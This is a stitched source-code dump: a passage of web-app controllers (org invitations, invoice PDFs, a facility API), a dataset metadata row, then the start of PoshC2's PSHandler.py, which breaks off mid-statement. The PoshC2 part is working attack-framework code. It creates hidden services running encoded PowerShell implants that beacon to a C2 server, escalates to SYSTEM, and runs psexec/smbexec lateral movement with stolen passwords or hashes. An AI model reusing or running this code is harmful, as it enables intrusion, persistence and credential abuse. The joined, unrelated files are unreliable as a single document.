phone = self._phone.get(pe_id)
if email or phone:
details = DIV(_class="contact-details")
if email:
details.append(DIV(ICON("mail"),
SPAN(A(email,
_href="mailto:%s" % email,
),
_class = "contact-email"),
_class = "contact-info",
))
if phone:
details.append(DIV(ICON("phone"),
SPAN(phone,
_class = "contact-phone"),
_class = "contact-info",
))
output.append(details)
return output
# =============================================================================
class InviteUserOrg(S3Method):
""" Custom Method Handler to invite User Organisations """
# -------------------------------------------------------------------------
def apply_method(self, r, **attr):
"""
Page-render entry point for REST interface.
@param r: the S3Request instance
@param attr: controller attributes
"""
output = {}
if r.http in ("GET", "POST"):
if not r.record:
r.error(400, current.ERROR.BAD_REQUEST)
if r.interactive:
output = self.invite(r, **attr)
else:
r.error(415, current.ERROR.BAD_FORMAT)
else:
r.error(405, current.ERROR.BAD_METHOD)
return output
# -------------------------------------------------------------------------
def invite(self, r, **attr):
"""
Prepare and process invitation form
@param r: the S3Request instance
@param attr: controller attributes
"""
T = current.T
db = current.db
s3db = current.s3db
response = current.response
request = current.request
session = current.session
settings = current.deployment_settings
auth = current.auth
auth_settings = auth.settings
auth_messages = auth.messages
output = {"title": T("Invite Organisation"),
}
# Check for existing accounts
active, disabled, invited = get_org_accounts(r.record.id)
if active or disabled:
response.error = T("There are already user accounts registered for this organization")
from s3 import s3_format_fullname
fullname = lambda user: s3_format_fullname(fname = user.first_name,
lname = user.last_name,
truncate = False,
)
account_list = DIV(_class="org-account-list")
if active:
account_list.append(H4(T("Active Accounts")))
accounts = UL()
for user in active:
accounts.append(LI("%s <%s>" % (fullname(user), user.email)))
account_list.append(accounts)
if disabled:
account_list.append(H4(T("Disabled Accounts")))
accounts = UL()
for user in disabled:
accounts.append(LI("%s <%s>" % (fullname(user), user.email)))
account_list.append(accounts)
output["item"] = account_list
response.view = self._view(r, "display.html")
return output
account = invited[0] if invited else None
# Look up email to use for invitation
email = None
if account:
email = account.email
else:
ctable = s3db.pr_contact
query = (ctable.pe_id == r.record.pe_id) & \
(ctable.contact_method == "EMAIL") & \
(ctable.deleted == False)
contact = db(query).select(ctable.value,
orderby = ctable.priority,
limitby = (0, 1),
).first()
if contact:
email = contact.value
# Form Fields
utable = auth_settings.table_user
dbset = db(utable.id != account.id) if account else db
formfields = [Field("email",
default = email,
requires = [IS_EMAIL(error_message = auth_messages.invalid_email),
IS_LOWER(),
IS_NOT_IN_DB(dbset, "%s.email" % utable._tablename,
error_message = auth_messages.duplicate_email,
),
]
),
]
# Generate labels (and mark required fields in the process)
labels, has_required = s3_mark_required(formfields)
response.s3.has_required = has_required
# Form buttons
SEND_INVITATION = T("Send New Invitation") if account else T("Send Invitation")
buttons = [INPUT(_type = "submit",
_value = SEND_INVITATION,
),
# TODO cancel-button?
]
# Construct the form
response.form_label_separator = ""
form = SQLFORM.factory(table_name = "invite",
record = None,
hidden = {"_next": request.vars._next},
labels = labels,
separator = "",
showid = False,
submit_button = SEND_INVITATION,
#delete_label = auth_messages.delete_label,
formstyle = settings.get_ui_formstyle(),
buttons = buttons,
*formfields)
# Identify form for CSS & JS Validation
form.add_class("send_invitation")
if form.accepts(request.vars,
session,
formname = "invite",
#onvalidation = auth_settings.register_onvalidation,
):
error = self.invite_account(r.record, form.vars.email, account=account)
if error:
response.error = T("Could not send invitation (%(reason)s)") % {"reason": error}
else:
response.confirmation = T("Invitation sent")
else:
if account:
response.warning = T("This organisation has been invited before!")
output["form"] = form
response.view = self._view(r, "update.html")
return output
# -------------------------------------------------------------------------
@classmethod
def invite_account(cls, organisation, email, account=None):
request = current.request
data = {"first_name": organisation.name,
"email": email,
# TODO language => use default language
"link_user_to": ["staff"],
"organisation_id": organisation.id,
}
# Generate registration key and activation code
from uuid import uuid4
key = str(uuid4())
code = uuid4().hex[-6:].upper()
# Add hash to data
data["registration_key"] = cls.keyhash(key, code)
if account:
success = account.update_record(**data)
if not success:
return "could not update preliminary account"
else:
utable = current.auth.settings.table_user
# Catch email addresses already used in existing accounts
if current.db(utable.email == email).select(utable.id,
limitby = (0, 1),
).first():
return "email address %s already in use" % email
user_id = utable.insert(**data)
if user_id:
ltable = current.s3db.org_organisation_user
ltable.insert(organisation_id = organisation.id,
user_id = user_id,
)
else:
return "could not create preliminary account"
# Compose and send invitation email
# => must use public_url setting because URL() produces a
# localhost address when called from CLI or script
base_url = current.deployment_settings.get_base_public_url()
appname = request.application
registration_url = "%s/%s/default/index/register_invited/%s"
data = {"url": registration_url % (base_url, appname, key),
"code": code,
}
from .notifications import CMSNotifications
return CMSNotifications.send(email, "InviteOrg", data,
module = "auth",
resource = "user",
)
# -------------------------------------------------------------------------
@staticmethod
def keyhash(key, code):
"""
Generate a hash of the activation code using
the registration key
@param key: the registration key
@param code: the activation code
@returns: the hash as string
"""
crypt = CRYPT(key=key, digest_alg="sha512", salt=None)
return str(crypt(code.upper())[0])
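        # Verification sketch (assumption, mirroring keyhash() rather than quoting the
        # registration workflow): a code entered by the invitee can be checked against
        # the stored registration_key by recomputing the same hash, e.g.
        #   crypt = CRYPT(key=key, digest_alg="sha512", salt=None)
        #   str(crypt(entered_code.upper())[0]) == stored_registration_key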
# =============================================================================
class InvoicePDF(S3Method):
"""
REST Method to generate an invoice PDF
- for external accounting archives
"""
def apply_method(self, r, **attr):
"""
Generate a PDF of an Invoice
@param r: the S3Request instance
@param attr: controller attributes
"""
if r.representation != "pdf":
r.error(415, current.ERROR.BAD_FORMAT)
if not r.record or r.http != "GET":
r.error(400, current.ERROR.BAD_REQUEST)
T = current.T
# Filename to include invoice number if available
invoice_no = r.record.invoice_no
from s3.s3export import S3Exporter
exporter = S3Exporter().pdf
return exporter(r.resource,
request = r,
method = "read",
pdf_title = T("Invoice"),
pdf_filename = invoice_no if invoice_no else None,
pdf_header = self.invoice_header,
pdf_callback = self.invoice,
pdf_footer = self.invoice_footer,
pdf_hide_comments = True,
pdf_header_padding = 12,
pdf_orientation = "Portrait",
pdf_table_autogrow = "B",
**attr
)
# -------------------------------------------------------------------------
@classmethod
def invoice_header(cls, r):
"""
Generate the invoice header
@param r: the S3Request
"""
T = current.T
table = r.resource.table
invoice = r.record
pdata = cls.lookup_header_data(invoice)
place = [pdata.get(k) for k in ("addr_postcode", "addr_place")]
header = TABLE(TR(TD(DIV(H4(T("Invoice")), P(" ")),
_colspan = 4,
),
),
TR(TH(T("Invoicing Party")),
TD(pdata.get("organisation", "-")),
TH(T("Invoice No.")),
TD(table.invoice_no.represent(invoice.invoice_no)),
),
TR(TH(T("Address")),
TD(pdata.get("addr_street", "-")),
TH(table.date.label),
TD(table.date.represent(invoice.date)),
),
TR(TH(T("Place")),
TD(" ".join(v for v in place if v)),
TH(T("Payers")),
TD(pdata.get("payers")),
),
TR(TH(T("Email")),
TD(pdata.get("email", "-")),
TH(T("Billing Date")),
TD(table.date.represent(pdata.get("billing_date"))),
),
)
return header
# -------------------------------------------------------------------------
@classmethod
def invoice(cls, r):
"""
Generate the invoice body
@param r: the S3Request
"""
T = current.T
table = r.table
invoice = r.record
pdata = cls.lookup_body_data(invoice)
# Lambda to format currency amounts
amt = lambda v: IS_FLOAT_AMOUNT.represent(v, precision=2, fixed=True)
currency = invoice.currency
# Specification of costs
costs = TABLE(TR(TH(T("No.")),
TH(T("Description")),
TH(T("Number##count")),
TH(T("Unit")),
TH(table.price_per_unit.label),
TH(T("Total")),
TH(table.currency.label),
),
TR(TD("1"), # only one line item here
TD(pdata.get("title", "-")),
TD(str(invoice.quantity_total)),
TD(pdata.get("unit", "-")),
TD(amt(invoice.price_per_unit)),
TD(amt(invoice.amount_receivable)),
TD(currency),
),
TR(TD(H5(T("Total")), _colspan=5),
TD(H5(amt(invoice.amount_receivable))),
TD(H5(currency)),
),
)
# Payment Details
an_field = table.account_number
an = an_field.represent(invoice.account_number)
payment_details = TABLE(TR(TH(table.account_holder.label),
TD(invoice.account_holder),
),
TR(TH(an_field.label),
TD(an),
),
TR(TH(table.bank_name.label),
TD(invoice.bank_name),
),
)
return DIV(H4(" "),
H5(T("Specification of Costs")),
costs,
H4(" "),
H4(" "),
H5(T("Payable within %(num)s days to") % {"num": 30}),
payment_details,
)
# -------------------------------------------------------------------------
@staticmethod
def invoice_footer(r):
"""
Generate the invoice footer
@param r: the S3Request
"""
T = current.T
invoice = r.record
# Details about who generated the document and when
user = current.auth.user
if not user:
username = T("anonymous user")
else:
username = s3_fullname(user)
now = S3DateTime.datetime_represent(current.request.utcnow, utc=True)
note = T("Document generated by %(user)s on %(date)s") % {"user": username,
"date": now,
}
# Details about the data source
vhash = invoice.vhash
try:
verification = vhash.split("$$")[1][:7]
except (AttributeError, IndexError):
verification = T("invalid")
settings = current.deployment_settings
source = TABLE(TR(TH(T("System Name")),
TD(settings.get_system_name()),
),
TR(TH(T("Web Address")),
TD(settings.get_base_public_url()),
),
TR(TH(T("Data Source")),
TD("%s [%s]" % (invoice.uuid, verification)),
),
)
return DIV(P(note), source)
# -------------------------------------------------------------------------
@staticmethod
def lookup_header_data(invoice):
"""
Look up data for the invoice header
@param invoice: the invoice record
@returns: dict with header data
"""
db = current.db
s3db = current.s3db
data = {}
btable = s3db.fin_voucher_billing
ptable = s3db.fin_voucher_program
otable = s3db.org_organisation
ftable = s3db.org_facility
ltable = s3db.gis_location
ctable = s3db.pr_contact
# Look up the billing date
query = (btable.id == invoice.billing_id)
billing = db(query).select(btable.date,
limitby = (0, 1),
).first()
if billing:
data["billing_date"] = billing.date
# Use the program admin org as "payers"
query = (ptable.id == invoice.program_id)
join = otable.on(otable.id == ptable.organisation_id)
admin_org = db(query).select(otable.name,
join = join,
limitby = (0, 1),
).first()
if admin_org:
data["payers"] = admin_org.name
# Look up details of the invoicing party
query = (otable.pe_id == invoice.pe_id) & \
(otable.deleted == False)
organisation = db(query).select(otable.id,
otable.name,
limitby = (0, 1),
).first()
if organisation:
data["organisation"] = organisation.name
# Email address
query = (ctable.pe_id == invoice.pe_id) & \
(ctable.contact_method == "EMAIL") & \
(ctable.deleted == False)
email = db(query).select(ctable.value,
limitby = (0, 1),
).first()
if email:
data["email"] = email.value
# Facility address
query = (ftable.organisation_id == organisation.id) & \
(ftable.obsolete == False) & \
(ftable.deleted == False)
left = ltable.on(ltable.id == ftable.location_id)
facility = db(query).select(ftable.email,
ltable.addr_street,
ltable.addr_postcode,
ltable.L3,
ltable.L4,
left = left,
limitby = (0, 1),
orderby = ftable.created_on,
).first()
if facility:
if data.get("email"):
# Fallback
data["email"] = facility.org_facility.email
location = facility.gis_location
data["addr_street"] = location.addr_street or "-"
data["addr_postcode"] = location.addr_postcode or "-"
data["addr_place"] = location.L4 or location.L3 or "-"
return data
# -------------------------------------------------------------------------
@staticmethod
def lookup_body_data(invoice):
"""
Look up additional data for invoice body
@param invoice: the invoice record
@returns: dict with invoice data
"""
db = current.db
s3db = current.s3db
ptable = s3db.fin_voucher_program
query = (ptable.id == invoice.program_id) & \
(ptable.deleted == False)
program = db(query).select(ptable.id,
ptable.name,
ptable.unit,
limitby = (0, 1),
).first()
if program:
data = {"title": program.name,
"unit": program.unit,
}
else:
data = {}
return data
# =============================================================================
class ClaimPDF(S3Method):
"""
REST Method to generate a claim PDF
- for external accounting archives
"""
def apply_method(self, r, **attr):
"""
Generate a PDF of a Claim
@param r: the S3Request instance
@param attr: controller attributes
"""
if r.representation != "pdf":
r.error(415, current.ERROR.BAD_FORMAT)
if not r.record or r.http != "GET":
r.error(400, current.ERROR.BAD_REQUEST)
T = current.T
# Filename to include invoice number if available
invoice_no = self.invoice_number(r.record)
from s3.s3export import S3Exporter
exporter = S3Exporter().pdf
return exporter(r.resource,
request = r,
method = "read",
pdf_title = T("Compensation Claim"),
pdf_filename = invoice_no if invoice_no else None,
pdf_header = self.claim_header,
pdf_callback = self.claim,
pdf_footer = self.claim_footer,
pdf_hide_comments = True,
pdf_header_padding = 12,
pdf_orientation = "Portrait",
pdf_table_autogrow = "B",
**attr
)
# -------------------------------------------------------------------------
@staticmethod
def invoice_number(record):
invoice_id = record.invoice_id
if invoice_id:
s3db = current.s3db
itable = s3db.fin_voucher_invoice
query = (itable.id == invoice_id)
invoice = current.db(query).select(itable.invoice_no,
cache = s3db.cache,
limitby = (0, 1),
).first()
else:
invoice = None
return invoice.invoice_no if invoice else None
# -------------------------------------------------------------------------
@classmethod
def claim_header(cls, r):
"""
Generate the claim header
@param r: the S3Request
"""
T = current.T
table = r.resource.table
itable = current.s3db.fin_voucher_invoice
claim = r.record
pdata = cls.lookup_header_data(claim)
place = [pdata.get(k) for k in ("addr_postcode", "addr_place")]
status = " " if claim.invoice_id else "(%s)" % T("not invoiced yet")
header = TABLE(TR(TD(DIV(H4(T("Compensation Claim")), P(status)),
_colspan = 4,
),
),
TR(TH(T("Invoicing Party")),
TD(pdata.get("organisation", "-")),
TH(T("Invoice No.")),
TD(itable.invoice_no.represent(pdata.get("invoice_no"))),
),
TR(TH(T("Address")),
TD(pdata.get("addr_street", "-")),
TH(itable.date.label),
TD(itable.date.represent(pdata.get("invoice_date"))),
),
TR(TH(T("Place")),
TD(" ".join(v for v in place if v)),
TH(T("Payers")),
TD(pdata.get("payers")),
),
TR(TH(T("Email")),
TD(pdata.get("email", "-")),
TH(T("Billing Date")),
TD(table.date.represent(pdata.get("billing_date"))),
),
)
return header
# -------------------------------------------------------------------------
@classmethod
def claim(cls, r):
"""
Generate the claim body
@param r: the S3Request
"""
T = current.T
table = r.table
claim = r.record
pdata = cls.lookup_body_data(claim)
# Lambda to format currency amounts
amt = lambda v: IS_FLOAT_AMOUNT.represent(v, precision=2, fixed=True)
currency = claim.currency
# Specification of costs
costs = TABLE(TR(TH(T("No.")),
TH(T("Description")),
TH(T("Number##count")),
TH(T("Unit")),
TH(table.price_per_unit.label),
TH(T("Total")),
TH(table.currency.label),
),
TR(TD("1"), # only one line item here
TD(pdata.get("title", "-")),
TD(str(claim.quantity_total)),
TD(pdata.get("unit", "-")),
TD(amt(claim.price_per_unit)),
TD(amt(claim.amount_receivable)),
TD(currency),
),
TR(TD(H5(T("Total")), _colspan=5),
TD(H5(amt(claim.amount_receivable))),
TD(H5(currency)),
),
)
# Payment Details
an_field = table.account_number
an = an_field.represent(claim.account_number)
payment_details = TABLE(TR(TH(table.account_holder.label),
TD(claim.account_holder),
),
TR(TH(an_field.label),
TD(an),
),
TR(TH(table.bank_name.label),
TD(claim.bank_name),
),
)
return DIV(H4(" "),
H5(T("Specification of Costs")),
costs,
H4(" "),
H4(" "),
H5(T("Payable within %(num)s days to") % {"num": 30}),
payment_details,
)
# -------------------------------------------------------------------------
@staticmethod
def claim_footer(r):
"""
Generate the claim footer
@param r: the S3Request
"""
T = current.T
claim = r.record
# Details about who generated the document and when
user = current.auth.user
if not user:
username = T("anonymous user")
else:
username = s3_fullname(user)
now = S3DateTime.datetime_represent(current.request.utcnow, utc=True)
note = T("Document generated by %(user)s on %(date)s") % {"user": username,
"date": now,
}
# Details about the data source
vhash = claim.vhash
try:
verification = vhash.split("$$")[1][:7]
except (AttributeError, IndexError):
verification = T("invalid")
settings = current.deployment_settings
source = TABLE(TR(TH(T("System Name")),
TD(settings.get_system_name()),
),
TR(TH(T("Web Address")),
TD(settings.get_base_public_url()),
),
TR(TH(T("Data Source")),
TD("%s [%s]" % (claim.uuid, verification)),
),
)
return DIV(P(note), source)
# -------------------------------------------------------------------------
@staticmethod
def lookup_header_data(claim):
"""
Look up data for the claim header
@param claim: the claim record
@returns: dict with header data
"""
db = current.db
s3db = current.s3db
data = {}
btable = s3db.fin_voucher_billing
itable = s3db.fin_voucher_invoice
ptable = s3db.fin_voucher_program
otable = s3db.org_organisation
ftable = s3db.org_facility
ltable = s3db.gis_location
ctable = s3db.pr_contact
# Look up the billing date
query = (btable.id == claim.billing_id)
billing = db(query).select(btable.date,
limitby = (0, 1),
).first()
if billing:
data["billing_date"] = billing.date
# Look up invoice details
if claim.invoice_id:
query = (itable.id == claim.invoice_id)
invoice = db(query).select(itable.date,
itable.invoice_no,
limitby = (0, 1),
).first()
if invoice:
data["invoice_no"] = invoice.invoice_no
data["invoice_date"] = invoice.date
# Use the program admin org as "payers"
query = (ptable.id == claim.program_id)
join = otable.on(otable.id == ptable.organisation_id)
admin_org = db(query).select(otable.name,
join = join,
limitby = (0, 1),
).first()
if admin_org:
data["payers"] = admin_org.name
# Look up details of the invoicing party
query = (otable.pe_id == claim.pe_id) & \
(otable.deleted == False)
organisation = db(query).select(otable.id,
otable.name,
limitby = (0, 1),
).first()
if organisation:
data["organisation"] = organisation.name
# Email address
query = (ctable.pe_id == claim.pe_id) & \
(ctable.contact_method == "EMAIL") & \
(ctable.deleted == False)
email = db(query).select(ctable.value,
limitby = (0, 1),
).first()
if email:
data["email"] = email.value
# Facility address
query = (ftable.organisation_id == organisation.id) & \
(ftable.obsolete == False) & \
(ftable.deleted == False)
left = ltable.on(ltable.id == ftable.location_id)
facility = db(query).select(ftable.email,
ltable.addr_street,
ltable.addr_postcode,
ltable.L3,
ltable.L4,
left = left,
limitby = (0, 1),
orderby = ftable.created_on,
).first()
if facility:
if data.get("email"):
# Fallback
data["email"] = facility.org_facility.email
location = facility.gis_location
data["addr_street"] = location.addr_street or "-"
data["addr_postcode"] = location.addr_postcode or "-"
data["addr_place"] = location.L4 or location.L3 or "-"
return data
# -------------------------------------------------------------------------
@staticmethod
def lookup_body_data(claim):
"""
Look up additional data for claim body
@param claim: the claim record
@returns: dict with claim data
"""
db = current.db
s3db = current.s3db
ptable = s3db.fin_voucher_program
query = (ptable.id == claim.program_id) & \
(ptable.deleted == False)
program = db(query).select(ptable.id,
ptable.name,
ptable.unit,
limitby = (0, 1),
).first()
if program:
data = {"title": program.name,
"unit": program.unit,
}
else:
data = {}
return data
# =============================================================================
class TestFacilityInfo(S3Method):
"""
REST Method to report details/activities of a test facility
"""
def apply_method(self, r, **attr):
"""
Report test facility information
@param r: the S3Request instance
@param attr: controller attributes
"""
if r.http == "POST":
if r.representation == "json":
output = self.facility_info(r, **attr)
else:
r.error(415, current.ERROR.BAD_FORMAT)
else:
r.error(405, current.ERROR.BAD_METHOD)
return output
# -------------------------------------------------------------------------
@staticmethod
def facility_info(r, **attr):
"""
Respond to a POST .json request, request body format:
{"client": "CLIENT", - the client identity (ocert)
"appkey": "APPKEY", - the client app key (ocert)
"code": "FACILITY-CODE", - the facility code
"report": ["start","end"], - the date interval to report
activities for (optional)
(ISO-format dates YYYY-MM-DD)
}
Output format:
{"code": "FACILITY-CODE", - echoed from input
"name": "FACILITY-NAME", - the facility name
"phone": "phone #", - the facility phone number
"email": "email", - the facility email address
"organisation":
{"name": "ORG-NAME", - the organisation name
"type": "ORG-TYPE", - the organisation type
"website": "URL" - the organisation website URL
},
"location":
{"L1": "L1-NAME", - the L1 name (state)
"L2": "L2-NAME", - the L2 name (district)
"L3": "L3-NAME", - the L3 name (commune/city)
"L4": "L4-NAME", - the L4 name (village/town)
"address": "STREET", - the street address
"postcode": "XXXXX" - the postcode
},
"report": ["start","end"], - echoed from input, ISO-format dates YYYY-MM-DD
"activity":
{"tests":59 - the total number of tests reported for the period
}
}
"""
settings = current.deployment_settings
# Get the configured, permitted clients
ocert = settings.get_custom("ocert")
if not ocert:
r.error(501, current.ERROR.METHOD_DISABLED)
# Read the body JSON of the request
body = r.body
body.seek(0)
try:
s = body.read().decode("utf-8")
except (ValueError, AttributeError, UnicodeDecodeError):
r.error(400, current.ERROR.BAD_REQUEST)
try:
ref = json.loads(s)
except JSONERRORS:
r.error(400, current.ERROR.BAD_REQUEST)
# Verify the client
client = ref.get("client")
if not client or client not in ocert:
r.error(403, current.ERROR.NOT_PERMITTED)
key, _ = ocert.get(client)
if key:
appkey = ref.get("appkey")
if not appkey or appkey.upper() != key.upper():
r.error(403, current.ERROR.NOT_PERMITTED)
# Identify the facility
db = current.db
s3db = current.s3db
table = s3db.org_facility
record = r.record
if record:
query = (table.id == record.id)
else:
code = ref.get("code")
if not code:
r.error(400, current.ERROR.BAD_REQUEST)
query = (table.code.upper() == code.upper())
query &= (table.deleted == False)
facility = db(query).select(table.code,
table.name,
table.phone1,
table.email,
table.website,
table.organisation_id,
table.location_id,
table.site_id,
limitby = (0, 1),
).first()
if not facility:
r.error(404, current.ERROR.BAD_RECORD)
# Prepare facility info
output = {"code": facility.code,
"name": facility.name,
"phone": facility.phone1,
"email": facility.email,
}
# Look up organisation data
otable = s3db.org_organisation
ttable = s3db.org_organisation_type
ltable = s3db.org_organisation_organisation_type
left = [ttable.on((ltable.organisation_id == otable.id) & \
(ltable.deleted == False) & \
(ttable.id == ltable.organisation_type_id)),
]
query = (otable.id == facility.organisation_id) & \
(otable.deleted == False)
row = db(query).select(otable.name,
otable.website,
ttable.name,
left = left,
limitby = (0, 1),
).first()
if row:
organisation = row.org_organisation
orgtype = row.org_organisation_type
orgdata = {"name": organisation.name,
"type": orgtype.name,
"website": organisation.website,
}
output["organisation"] = orgdata
# Look up location data
ltable = s3db.gis_location
query = (ltable.id == facility.location_id) & \
(ltable.deleted == False)
row = db(query).select(ltable.L1,
ltable.L2,
ltable.L3,
ltable.L4,
ltable.addr_street,
ltable.addr_postcode,
limitby = (0, 1),
).first()
if row:
locdata = {"L1": row.L1,
"L2": row.L2,
"L3": row.L3,
"L4": row.L4,
"address": row.addr_street,
"postcode": row.addr_postcode,
}
output["location"] = locdata
# Look up activity data
report = ref.get("report")
if isinstance(report, list) and len(report) == 2:
parse_date = current.calendar.parse_date
start, end = parse_date(s3_str(report[0])), \
parse_date(s3_str(report[1]))
if start and end:
if start > end:
start, end = end, start
table = s3db.disease_testing_report
query = (table.site_id == facility.site_id) & \
(table.date >= start) & \
(table.date <= end) & \
(table.deleted == False)
total = table.tests_total.sum()
row = db(query).select(total).first()
tests_total = row[total]
if not tests_total:
tests_total = 0
output["report"] = [start.isoformat(), end.isoformat()]
output["activity"] = {"tests": tests_total}
else:
r.error(400, "Invalid date format in report parameter")
else:
r.error(400, "Invalid report parameter format")
# Return as JSON
response = current.response
if response:
response.headers["Content-Type"] = "application/json; charset=utf-8"
return json.dumps(output, separators=(",", ":"), ensure_ascii=False)
# END =========================================================================
| 35.624085
| 100
| 0.464814
|
ca5eb1a819bdf28fdc5cb54fe4883800ea5e8c8d
| 39,327
|
py
|
Python
|
PSHandler.py
|
l0gan/PoshC2
|
1012ff5684e9a0f7811bf76fd04f43ccd7649e3a
|
[
"BSD-3-Clause"
] | 1
|
2020-06-27T00:34:07.000Z
|
2020-06-27T00:34:07.000Z
|
PSHandler.py
|
TheWover/PoshC2
|
ef33808a3f0c4473a4a238518551997463e31e53
|
[
"BSD-3-Clause"
] | null | null | null |
PSHandler.py
|
TheWover/PoshC2
|
ef33808a3f0c4473a4a238518551997463e31e53
|
[
"BSD-3-Clause"
] | null | null | null |
import base64, re, traceback, os, sys
from Alias import ps_alias
from Colours import Colours
from Utils import validate_sleep_time
from DB import new_task, update_sleep, get_history, select_item, update_label, unhide_implant, kill_implant, get_implantdetails, get_c2server_all, get_newimplanturl, get_allurls, get_sharpurls, get_cred_by_id, new_c2_message
from AutoLoads import check_module_loaded, run_autoloads
from Help import posh_help, posh_help1, posh_help2, posh_help3, posh_help4, posh_help5, posh_help6, posh_help7, posh_help8
from Config import PayloadsDirectory, POSHDIR, ROOTDIR, SocksHost
from Core import get_creds_from_params
from Opsec import ps_opsec
from Payloads import Payloads
from Utils import argp, load_file, gen_key
from prompt_toolkit import PromptSession
from prompt_toolkit.history import FileHistory
from prompt_toolkit.auto_suggest import AutoSuggestFromHistory
from prompt_toolkit.styles import Style
from CommandPromptCompleter import FilePathCompleter
def handle_ps_command(command, user, randomuri, startup, createdaisypayload, createproxypayload, implant_id, commandloop):
try:
check_module_loaded("Stage2-Core.ps1", randomuri, user)
except Exception as e:
print("Error loading Stage2-Core.ps1: %s" % e)
# alias mapping
for alias in ps_alias:
if command.startswith(alias[0]):
command.replace(alias[0], alias[1])
command = command.strip()
run_autoloads(command, randomuri, user)
# opsec failures
for opsec in ps_opsec:
if opsec == command[:len(opsec)]:
print(Colours.RED)
print("**OPSEC Warning**")
impid = get_implantdetails(randomuri)
ri = input("Do you want to continue running - %s? (y/N) " % command)
if ri.lower() == "n":
command = ""
if ri == "":
command = ""
break
if command.startswith("beacon") or command.startswith("set-beacon") or command.startswith("setbeacon"):
new_sleep = command.replace('set-beacon ', '')
new_sleep = new_sleep.replace('setbeacon ', '')
new_sleep = new_sleep.replace('beacon ', '').strip()
if not validate_sleep_time(new_sleep):
print(Colours.RED)
print("Invalid sleep command, please specify a time such as 50s, 10m or 1h")
print(Colours.GREEN)
else:
new_task(command, user, randomuri)
update_sleep(new_sleep, randomuri)
elif command.startswith("unhook-amsi"):
new_task("unhook", user, randomuri)
elif command.startswith("searchhelp"):
searchterm = (command).replace("searchhelp ", "")
helpful = posh_help.split('\n')
for line in helpful:
if searchterm in line.lower():
print(Colours.GREEN + line)
elif (command == "back") or (command == "clear"):
startup(user)
elif command == "download-files":
print(Colours.RED + "Please enter a full path to the directory" + Colours.GREEN)
startup(user)
elif command.startswith("install-servicelevel-persistencewithproxy"):
C2 = get_c2server_all()
if C2[11] == "":
startup(user, "Need to run createproxypayload first")
else:
newPayload = Payloads(C2[5], C2[2], C2[1], C2[3], C2[8], C2[12],
C2[13], C2[11], "", "", C2[19], C2[20],
C2[21], "%s?p" % get_newimplanturl(), PayloadsDirectory)
payload = newPayload.CreateRawBase()
cmd = "sc.exe create CPUpdater binpath= 'cmd /c powershell -exec bypass -Noninteractive -windowstyle hidden -e %s' Displayname= CheckpointServiceUpdater start= auto" % (payload)
new_task(cmd, user, randomuri)
elif command.startswith("install-servicelevel-persistence"):
C2 = get_c2server_all()
newPayload = Payloads(C2[5], C2[2], C2[1], C2[3], C2[8], "",
"", "", "", "", C2[19], C2[20],
C2[21], get_newimplanturl(), PayloadsDirectory)
payload = newPayload.CreateRawBase()
cmd = "sc.exe create CPUpdater binpath= 'cmd /c powershell -exec bypass -Noninteractive -windowstyle hidden -e %s' Displayname= CheckpointServiceUpdater start= auto" % (payload)
new_task(cmd, user, randomuri)
elif command.startswith("remove-servicelevel-persistence"):
new_task("sc.exe delete CPUpdater", user, randomuri)
# psexec lateral movement
elif command.startswith("get-implantworkingdirectory"):
new_task("pwd", user, randomuri)
elif command.startswith("get-system-withproxy"):
C2 = get_c2server_all()
if C2[11] == "":
startup(user, "Need to run createproxypayload first")
else:
newPayload = Payloads(C2[5], C2[2], C2[1], C2[3], C2[8], C2[12],
C2[13], C2[11], "", "", C2[19], C2[20],
C2[21], "%s?p" % get_newimplanturl(), PayloadsDirectory)
payload = newPayload.CreateRawBase()
cmd = "sc.exe create CPUpdaterMisc binpath= 'cmd /c powershell -exec bypass -Noninteractive -windowstyle hidden -e %s' Displayname= CheckpointServiceModule start= auto" % payload
new_task(cmd, user, randomuri)
cmd = "sc.exe start CPUpdaterMisc"
new_task(cmd, user, randomuri)
cmd = "sc.exe delete CPUpdaterMisc"
new_task(cmd, user, randomuri)
elif command.startswith("get-system-withdaisy"):
C2 = get_c2server_all()
daisyname = input("Payload name required: ")
if os.path.isfile(("%s%spayload.bat" % (PayloadsDirectory, daisyname))):
with open("%s%spayload.bat" % (PayloadsDirectory, daisyname), "r") as p:
payload = p.read()
cmd = "sc.exe create CPUpdaterMisc binpath= 'cmd /c %s' Displayname= CheckpointServiceModule start= auto" % payload
new_task(cmd, user, randomuri)
cmd = "sc.exe start CPUpdaterMisc"
new_task(cmd, user, randomuri)
cmd = "sc.exe delete CPUpdaterMisc"
new_task(cmd, user, randomuri)
elif command.startswith("get-system"):
C2 = get_c2server_all()
newPayload = Payloads(C2[5], C2[2], C2[1], C2[3], C2[8], "",
"", "", "", "", C2[19], C2[20],
C2[21], get_newimplanturl(), PayloadsDirectory)
payload = newPayload.CreateRawBase()
cmd = "sc.exe create CPUpdaterMisc binpath= 'cmd /c powershell -exec bypass -Noninteractive -windowstyle hidden -e %s' Displayname= CheckpointServiceModule start= auto" % payload
new_task(cmd, user, randomuri)
cmd = "sc.exe start CPUpdaterMisc"
new_task(cmd, user, randomuri)
cmd = "sc.exe delete CPUpdaterMisc"
new_task(cmd, user, randomuri)
elif command == "quit":
ri = input("Are you sure you want to quit? (Y/n) ")
if ri.lower() == "n":
startup(user)
if ri == "" or ri.lower() == "y":
new_c2_message("%s logged off." % user)
sys.exit(0)
elif command.startswith("invoke-psexec ") or command.startswith("invoke-smbexec "):
check_module_loaded("Invoke-SMBExec.ps1", randomuri, user)
params = re.compile("invoke-smbexec |invoke-psexec ", re.IGNORECASE)
params = params.sub("", command)
if "-credid" in params:
creds, params = get_creds_from_params(params, startup, user)
if creds is None:
startup(user, "CredID not found")
if creds['Password']:
params = params + " -domain %s -username %s -pass %s" % (creds['Domain'], creds['Username'], creds['Password'])
else:
params = params + " -domain %s -username %s -hash %s" % (creds['Domain'], creds['Username'], creds['Hash'])
cmd = "invoke-smbexec %s" % params
new_task(cmd, user, randomuri)
elif command.startswith("invoke-psexecproxypayload"):
check_module_loaded("Invoke-PsExec.ps1", randomuri, user)
if os.path.isfile(("%s%spayload.bat" % (PayloadsDirectory, "Proxy"))):
with open("%s%spayload.bat" % (PayloadsDirectory, "Proxy"), "r") as p:
payload = p.read()
params = re.compile("invoke-psexecproxypayload ", re.IGNORECASE)
params = params.sub("", command)
if "-credid" in params:
creds, params = get_creds_from_params(params, startup, user)
if creds is None:
startup(user, "CredID not found")
if creds['Password']:
params = params + " -domain %s -username %s -pass %s" % (creds['Domain'], creds['Username'], creds['Password'])
else:
params = params + " -domain %s -username %s -hash %s" % (creds['Domain'], creds['Username'], creds['Hash'])
cmd = "invoke-psexec %s -command \"%s\"" % (params, payload)
new_task(cmd, user, randomuri)
else:
